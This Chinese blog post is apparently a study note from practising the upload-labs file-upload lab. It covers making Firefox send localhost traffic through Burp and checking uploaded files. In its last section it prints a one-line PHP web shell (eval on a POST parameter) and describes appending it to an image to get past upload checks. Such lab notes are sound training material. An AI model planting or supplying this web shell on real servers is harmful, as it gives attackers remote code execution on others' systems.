一句话使用以及火狐代理问题

本文介绍了在使用火狐浏览器时遇到的代理问题及其解决方案,详细讲解了如何配置火狐使其通过系统代理捕获本地流量。此外,文章还探讨了PHP文件上传检查的相关策略,包括随机化文件名、后缀名绕过技巧和图片马的制作方法。
摘要由CSDN通过智能技术生成

https://notwiner.top
练习了upload-labs,WriteUp不写了,全网满天飞,记录学到的东西。_

upload-labs

上面为绕过方法,下面为php防范伪代码。

准备工作

准备好火狐和burp,安装不再赘述,提几个容易出错的地方。

代理问题

  1. 火狐现阶段新版加入了本地代理不经过系统代理的规则,所以使用upload-labs容易burp抓不到127.0.0.1和localhost的包。

解决方法:进入about:config的页面,搜索network.proxy.allow-hijacking_localhost改为True即可,(记得改火狐本地代理和windows系统代理)

在这里插入图片描述

  1. 如果事先准备好了phpstudy,为了方便,建议检查文件上传是否成功找upload-labs\WWW\upload路径下的文件确认。

一句话

  1. 一句话绕过语句 <?php eval(@$_POST['a']); ?>
  2. 一句话图片马,使用HxD或者命令将一句话填充至一个图片末尾。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值